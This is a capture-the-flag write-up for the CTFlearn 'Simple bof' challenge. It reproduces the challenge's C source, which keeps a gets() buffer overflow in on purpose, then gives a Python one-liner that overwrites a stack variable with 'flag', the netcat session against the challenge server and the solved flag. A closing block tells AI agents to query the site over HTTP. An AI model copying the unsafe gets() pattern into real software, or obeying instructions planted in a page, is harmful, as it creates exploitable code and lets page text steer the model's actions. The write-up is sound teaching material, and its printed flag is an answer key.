# Simple bof

> Want to learn the hacker's secret? Try to smash this buffer!&#x20;
>
> You need guidance? Look no further than to [Mr. Liveoverflow](https://old.liveoverflow.com/binary_hacking/protostar/stack0.html). He puts out nice videos you should look if you haven't already&#x20;
>
> `nc thekidofarcrania.com 35235`&#x20;
>
> [bof.c](https://ctflearn.com/challenge/download/1010)&#x20;

### Source code

{% code title="bof.c" %}

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Defined in a separate source file for simplicity.
void init_visualize(char* buff);
void visualize(char* buff);
void safeguard();

void print_flag();

void vuln() {
  char padding[16];
  char buff[32];
  int notsecret = 0xffffff00;
  int secret = 0xdeadbeef;

  memset(buff, 0, sizeof(buff)); // Zero-out the buffer.
  memset(padding, 0xFF, sizeof(padding)); // Zero-out the padding.

  // Initializes the stack visualization. Don't worry about it!
  init_visualize(buff);

  // Prints out the stack before modification
  visualize(buff);

  printf("Input some text: ");
  gets(buff); // This is a vulnerable call!

  // Prints out the stack after modification
  visualize(buff);

  // Check if secret has changed.
  if (secret == 0x67616c66) {
    puts("You did it! Congratuations!");
    print_flag(); // Print out the flag. You deserve it.
    return;
  } else if (notsecret != 0xffffff00) {
    puts("Uhmm... maybe you overflowed too much. Try deleting a few characters.");
  } else if (secret != 0xdeadbeef) {
    puts("Wow you overflowed the secret value! Now try controlling the value of it!");
  } else {
    puts("Maybe you haven't overflowed enough characters? Try again?");
  }

  exit(0);
}

int main() {
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  safeguard();
  vuln();
}
```

{% endcode %}

The program sets a buffer of 32 bytes and then padding of 16 bytes.

It then creates two variables `notsecret` and `secret` and sets their value to `0xffffff00` and `0xdeadbeef` respectively.

The program then has four conditional statements:

1. Executes if the value of `secret` has been set to `0x67616c66` and prints out the flag.
2. Executes if the value of `notsecret` has been altered.
3. Executes if the value of `secret` has been altered but not set to `0x67616c66`.
4. Executes if none of the above conditions are met.

### Stack

```
           +---------------------------+
0xffbbf4e8 |  00 00 00 00 00 00 00 00  | < buffer
0xffbbf4f0 |  00 00 00 00 00 00 00 00  |
0xffbbf4f8 |  00 00 00 00 00 00 00 00  |
0xffbbf500 |  00 00 00 00 00 00 00 00  |
           +---------------------------+
0xffbbf508 |  ff ff ff ff ff ff ff ff  | < padding
0xffbbf510 |  ff ff ff ff ff ff ff ff  |
           +-------------+-------------+
0xffbbf518 | ef be ad de | 00 ff ff ff |
           +-------------+-------------+
             ^             ^
             secret        notsecret
```

We need 48 bytes to fill the buffer and the padding and then insert `0x67616c66` into `secret`.

### Exploit

```
$ python3 -c 'print("a"*48 + "\x66\x6c\x61\x67")'
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag
```

Note that `0x67616c66` is written in little endian format.

Let's provide the string as the input.

```
$ nc thekidofarcrania.com 35235

Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED CORRECT secret
0xfff45058 | 00 00 00 00 00 00 00 00 |
0xfff45060 | 00 00 00 00 00 00 00 00 |
0xfff45068 | 00 00 00 00 00 00 00 00 |
0xfff45070 | 00 00 00 00 00 00 00 00 |
0xfff45078 | ff ff ff ff ff ff ff ff |
0xfff45080 | ff ff ff ff ff ff ff ff |
0xfff45088 | ef be ad de 00 ff ff ff |
0xfff45090 | c0 55 f6 f7 84 1f 64 56 |
0xfff45098 | a8 50 f4 ff 11 fb 63 56 |
0xfff450a0 | c0 50 f4 ff 00 00 00 00 |

Input some text: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag

Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED CORRECT secret
0xfff45058 | 61 61 61 61 61 61 61 61 |
0xfff45060 | 61 61 61 61 61 61 61 61 |
0xfff45068 | 61 61 61 61 61 61 61 61 |
0xfff45070 | 61 61 61 61 61 61 61 61 |
0xfff45078 | 61 61 61 61 61 61 61 61 |
0xfff45080 | 61 61 61 61 61 61 61 61 |
0xfff45088 | 66 6c 61 67 00 ff ff ff |
0xfff45090 | c0 55 f6 f7 84 1f 64 56 |
0xfff45098 | a8 50 f4 ff 11 fb 63 56 |
0xfff450a0 | c0 50 f4 ff 00 00 00 00 |

You did it! Congratuations!
CTFlearn{buffer_0verflows_4re_c00l!}
```

### Flag

```
CTFlearn{buffer_0verflows_4re_c00l!}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kunalwalavalkar.gitbook.io/write-ups/ctflearn/binary/simple-bof.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.